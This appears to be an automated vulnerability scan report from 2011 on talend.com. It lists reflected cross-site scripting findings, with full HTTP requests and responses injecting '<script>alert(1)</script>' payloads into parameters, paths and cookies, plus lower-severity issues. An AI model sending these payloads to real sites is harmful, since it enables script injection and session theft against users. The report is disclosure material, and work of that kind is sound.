XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, talend.com

Report generated by XSS.CX at Mon Sep 05 11:04:46 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

XSS in talend.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.1. http://www.talend.com/download.php [name of an arbitrarily supplied request parameter]

1.2. http://www.talend.com/download_form.php [cont parameter]

1.3. http://www.talend.com/download_form.php [name of an arbitrarily supplied request parameter]

1.4. http://www.talend.com/download_form.php [src parameter]

1.5. http://www.talend.com/download.php [src cookie]

1.6. http://www.talend.com/library/reflibrary.php [src cookie]

2. Cross-domain Referer leakage

2.1. http://www.talend.com/download_form.php

2.2. http://www.talend.com/library/reflibrary.php

3. Cross-domain script include

3.1. http://www.talend.com/download.php

3.2. http://www.talend.com/download_form.php

3.3. http://www.talend.com/index.php

3.4. http://www.talend.com/library/reflibrary.php

3.5. http://www.talend.com/products-application-integration/matrix.php

4. Cookie without HttpOnly flag set

4.1. http://www.talend.com/download_form.php

4.2. http://www.talend.com/library/reflibrary.php

5. Email addresses disclosed

5.1. http://www.talend.com/css/navlinksV3.css

5.2. http://www.talend.com/css/slideProducts7.css

5.3. http://www.talend.com/css/talendV5.css

5.4. http://www.talend.com/download.php

5.5. http://www.talend.com/download_form.php

5.6. http://www.talend.com/index.php

5.7. http://www.talend.com/js/jquery.colorbox-min.js

5.8. http://www.talend.com/library/reflibrary.php

5.9. http://www.talend.com/products-application-integration/matrix.php

6. HTML uses unrecognised charset

6.1. http://www.talend.com/download.php

6.2. http://www.talend.com/library/reflibrary.php



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.talend.com/download.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b6c"><script>alert(1)</script>c3b954258a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download.php/d7b6c"><script>alert(1)</script>c3b954258a7 HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.3.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 266636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<form method="post" action="/download.php/d7b6c"><script>alert(1)</script>c3b954258a7" name="downloaddoc" id="downloaddoc" >
...[SNIP]...

1.2. http://www.talend.com/download_form.php [cont parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download_form.php

Issue detail

The value of the cont request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbe96"><script>alert(1)</script>111345ec55c was submitted in the cont parameter. This input was echoed as cbe96\"><script>alert(1)</script>111345ec55c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download_form.php?cont=mdmcbe96"><script>alert(1)</script>111345ec55c&src=HomePage HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomePage; expires=Wed, 05-Oct-2011 17:01:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<input type="hidden" name="cont" value="mdmcbe96\"><script>alert(1)</script>111345ec55c" />
...[SNIP]...

1.3. http://www.talend.com/download_form.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download_form.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c37b"><script>alert(1)</script>7aed1292adc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c37b\"><script>alert(1)</script>7aed1292adc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download_form.php?cont=mdm&src=Home/4c37b"><script>alert(1)</script>7aed1292adcPage HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=Home%2F4c37b%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7aed1292adcPage; expires=Wed, 05-Oct-2011 17:01:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a class="urlDwnProductMDM" rel="nofollow" onclick="conversionJsGoogle(); run('version=tmdmce_other_422&src=Home/4c37b\"><script>alert(1)</script>7aed1292adcPage&srv=us1&kid=','MDM'); " href="#" title="TMDMCE-All-r63143-V4.2.2.zip">
...[SNIP]...

1.4. http://www.talend.com/download_form.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download_form.php

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a03"><script>alert(1)</script>83b766e69f was submitted in the src parameter. This input was echoed as c4a03\"><script>alert(1)</script>83b766e69f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download_form.php?cont=mdm&src=HomePagec4a03"><script>alert(1)</script>83b766e69f HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomePagec4a03%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E83b766e69f; expires=Wed, 05-Oct-2011 17:01:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a class="urlDwnProductMDM" rel="nofollow" onclick="conversionJsGoogle(); run('version=tmdmce_other_422&src=HomePagec4a03\"><script>alert(1)</script>83b766e69f&srv=us1&kid=','MDM'); " href="#" title="TMDMCE-All-r63143-V4.2.2.zip">
...[SNIP]...

1.5. http://www.talend.com/download.php [src cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download.php

Issue detail

The value of the src cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6a0c"><script>alert(1)</script>54a3de5ec05 was submitted in the src cookie. This input was echoed as e6a0c\"><script>alert(1)</script>54a3de5ec05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /download.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePagee6a0c"><script>alert(1)</script>54a3de5ec05; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.3.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 279978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a class="urlDwnProduct" rel="nofollow" onclick="conversionJsGoogle(); run('version=v422wz&src=HomePagee6a0c\"><script>alert(1)</script>54a3de5ec05&srv=us1&kid='); showFormDoc('DI')" href="#" title="TOS-Win32-r63143-V4.2.2.exe">
...[SNIP]...

1.6. http://www.talend.com/library/reflibrary.php [src cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /library/reflibrary.php

Issue detail

The value of the src cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 845b3"><script>alert(1)</script>4cdce213d67 was submitted in the src cookie. This input was echoed as 845b3\"><script>alert(1)</script>4cdce213d67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /library/reflibrary.php?src=HomepageSpecial HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/products-application-integration/matrix.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage845b3"><script>alert(1)</script>4cdce213d67; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.5.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomepageSpecial; expires=Wed, 05-Oct-2011 17:02:43 GMT; path=/
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 211215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<input type="hidden" name="src" value="HomePage845b3\"><script>alert(1)</script>4cdce213d67"/>
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://www.talend.com/download_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download_form.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /download_form.php?cont=mdm&src=HomePage HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomePage; expires=Wed, 05-Oct-2011 17:01:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<p class="addpad">This application and its source code are provided under the GPL v2 open source license agreement terms. For further information about this license agreement, go to <a href="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html">http://www.gnu.org/licenses/old-licenses/gpl-2.0.html</a>
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://px.owneriq.net/anst/s/talend.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1042739340/?label=624eCLihhAIQjOGb8QM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

2.2. http://www.talend.com/library/reflibrary.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /library/reflibrary.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /library/reflibrary.php?src=HomepageSpecial HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/products-application-integration/matrix.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.5.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:02:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomepageSpecial; expires=Wed, 05-Oct-2011 17:02:01 GMT; path=/
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 210291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" />
       
   <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://feeds.feedburner.com/Talend" />
   <link rel="alternate" type="text/xml" title="RSS .92" href="http://feeds.feedburner.com/Talend" />
   <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.talend.com/blog/xmlrpc.php?rsd" />
...[SNIP]...
<td class="no_space"><a href="http://www.talendforge.org" class="talendforge" id="talendforge" title="TalendForge">TalendForge</a>
...[SNIP]...
<li id="Overview"><a href="http://www.talendforge.org" title="Overview">Overview</a></li><li id="Babili"><a href="http://www.talendforge.org/babili/" title="Babili - Translation">Translation</a>
...[SNIP]...
<li id="Ecosystem"><a href="http://www.talendforge.org/exchange/" title="Exchange">Exchange</a></li><li id="Forum"><a href="http://www.talendforge.org/forum/index.php" title="Forum">Forum</a></li><li id="Teamblog"><a href="http://www.talendforge.org/news/" title="News Feed">News Feed</a></li><li id="Components"><a href="http://www.talendforge.org/components/index.php" title="Components">Components</a></li><li id="Tutorials"><a href="http://www.talendforge.org/tutorials/menu.php" title="Tutorials">Tutorials</a></li> <li id="Wiki"><a href="http://www.talendforge.org/wiki/" title="Wiki">Wiki</a></li><li id="Sources"><a href="http://www.talendforge.org/trac/tos" title="Sources">Sources</a></li><li id="Bugtracker"><a href="http://www.talendforge.org/bugs/" title="Bugtracker">Bugtracker</a></li><li id="Tests"><a href="http://www.talendforge.org/colibri/" title="Tests">Tests</a>
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://px.owneriq.net/anst/s/talend.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

3. Cross-domain script include  previous  next
There are 5 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://www.talend.com/download.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /download.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: src=HomePage; __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.3.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 264091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://px.owneriq.net/anst/s/talend.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

3.2. http://www.talend.com/download_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /download_form.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /download_form.php?cont=mdm&src=HomePage HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=265980560.152499165.1315242043.1315242043.1315242043.1; __utmb=265980560.1.10.1315242043; __utmc=265980560; __utmz=265980560.1315242043.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:347-IAT-677&token:_mch-talend.com-1315242043519-96990

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:01:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: src=HomePage; expires=Wed, 05-Oct-2011 17:01:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://px.owneriq.net/anst/s/talend.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

3.3. http://www.talend.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 17:00:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Connection: close
Content-Type: text/html
Content-Length: 52848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://px.owneriq.net/anst/s/talend.js"></script>
...[SNIP]...
</script>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

3.4. http://www.talend.com/library/reflibrary.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talend.com
Path:   /library/reflibrary.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /library/reflibrary.php?src=HomepageSpecial HTTP/1.1
Host: www.talend.com
Proxy-Connection: keep-alive
Referer: http://www.talend.com/products-application-integration/matrix.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
